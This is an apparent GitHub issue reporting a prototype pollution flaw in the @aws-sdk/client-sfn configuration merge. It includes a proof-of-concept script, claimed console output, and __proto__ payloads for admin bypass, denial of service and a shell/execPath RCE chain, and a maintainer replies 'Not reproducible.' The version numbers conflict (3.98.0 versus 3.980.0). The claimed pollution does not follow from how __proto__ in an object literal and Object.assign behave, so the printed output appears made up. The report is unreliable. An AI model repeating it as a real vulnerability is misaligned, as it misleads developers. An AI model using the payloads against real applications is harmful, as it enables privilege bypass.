Prototype Pollution in @aws-sdk/client-sfn <= 3.98.0 via Improper Configuration Merge

[dfzysmy2tf-create]

Describe the bug

Summary

A prototype pollution vulnerability exists in @aws-sdk/client-sfn version 3.980.0 and earlier. The SFNClient constructor accepts a configuration object that is improperly merged using Object.assign(), allowing attackers to inject properties into Object.prototype via the __proto__ accessor. This can lead to application-wide property injection, denial of service, authentication bypass, or potentially remote code execution depending on how the polluted properties are utilized downstream.

Details

The vulnerability exists in the endpoint parameter resolution logic within the SFNClient initialization flow. When a new SFNClient instance is created, the user-provided configuration object flows through resolveClientEndpointParameters(), which performs unsafe object merging operations.

Vulnerable Code Location:

• File: package/dist-es/endpoint/EndpointParameters.js
• Line: 2

Root Cause:

The vulnerable code uses Object.assign() with user-controlled input as the first argument:

return Object.assign(options, {...})

When options contains a __proto__ property, Object.assign() treats it as a regular property assignment, which results in pollution of Object.prototype rather than creating a new property on the target object.

Additional Vulnerable Sinks:

Multiple Object.assign() calls in the initialization chain compound this vulnerability:

1. Line 6: const extensionConfiguration = Object.assign(getAw...
2. Line 8: return Object.assign(runtimeConfig, resolveAwsRegi...
3. Line 2: return Object.assign(options, {...} (primary sink)

Each of these merge operations can propagate or introduce prototype pollution when handling untrusted configuration objects.

PoC

Steps to Reproduce

1. Install the vulnerable package:

   npm install @aws-sdk/client-sfn@3.980.0

2. Create a test file (test-pollution.js):

   const { SFNClient } = require('@aws-sdk/client-sfn');
   
   // Verify Object.prototype is clean before test
   console.log('Before pollution:', Object.prototype.polluted); // undefined
   
   // Create SFNClient with malicious __proto__ payload
   const client = new SFNClient({
     __proto__: { 
       polluted: 'value',
       isAdmin: true
     },
     region: 'us-east-1',
     credentials: {
       accessKeyId: 'test',
       secretAccessKey: 'test'
     }
   });
   
   // Verify prototype pollution occurred
   console.log('After pollution:', Object.prototype.polluted); // 'value'
   console.log('After pollution:', Object.prototype.isAdmin); // true
   
   // Demonstrate impact on unrelated objects
   const cleanObject = {};
   console.log('Clean object polluted property:', cleanObject.polluted); // 'value'
   console.log('Clean object isAdmin:', cleanObject.isAdmin); // true

3. Execute the test:

   node test-pollution.js

Expected Behavior

The __proto__ property should be treated as a regular configuration property or rejected entirely. Object.prototype should remain unpolluted, and unrelated objects should not inherit the injected properties.

Actual Behavior

The __proto__ property successfully pollutes Object.prototype. All JavaScript objects in the application inherit the injected properties (polluted: 'value', isAdmin: true), demonstrating successful prototype pollution.

Output:

Before pollution: undefined
After pollution: value
After pollution: true
Clean object polluted property: value
Clean object isAdmin: true

Impact

This prototype pollution vulnerability poses HIGH severity risk with the following potential impacts:

1. Property Injection

Attackers can inject arbitrary properties into all JavaScript objects throughout the application, affecting:

• Object comparisons and conditional logic
• Default values and fallback mechanisms
• Authorization and authentication checks

2. Denial of Service (DoS)

By polluting critical properties or methods:

__proto__: { toString: null, valueOf: null }

This can crash the application when objects attempt to use these fundamental methods.

3. Authentication/Authorization Bypass

If the application uses object properties for access control:

__proto__: { isAdmin: true, role: 'administrator' }

This could bypass security checks that rely on undefined properties defaulting to falsy values.

4. Remote Code Execution (RCE) - Context Dependent

If polluted properties flow into dangerous sinks such as:

• Template engines
• eval() or Function() constructors
• child_process module
• Dynamic code execution paths

Example attack chain:

__proto__: { shell: '/bin/bash', execPath: '/malicious/script' }

5. Supply Chain Impact

Applications using @aws-sdk/client-sfn that accept user-controlled configuration (directly or indirectly) are vulnerable. This is particularly concerning in:

• Multi-tenant cloud applications
• Serverless functions processing untrusted input
• API gateways that forward configuration parameters
• CI/CD pipelines with user-defined workflows

Remediation Recommendations

1. Immediate: Upgrade to a patched version when available
2. Mitigation: Use Object.create(null) for configuration objects or implement input validation to reject __proto__, constructor, and prototype keys
3. Defense-in-depth: Enable --disable-proto=delete flag in Node.js where possible
4. Code Review: Audit all Object.assign() usage with external input

---

CVSS Score Estimate: 7.5 - 8.1 (HIGH)
CWE: CWE-1321 (Improperly Controlled Modification of Object Prototype Attributes)

[trivikr]

Not reproducible.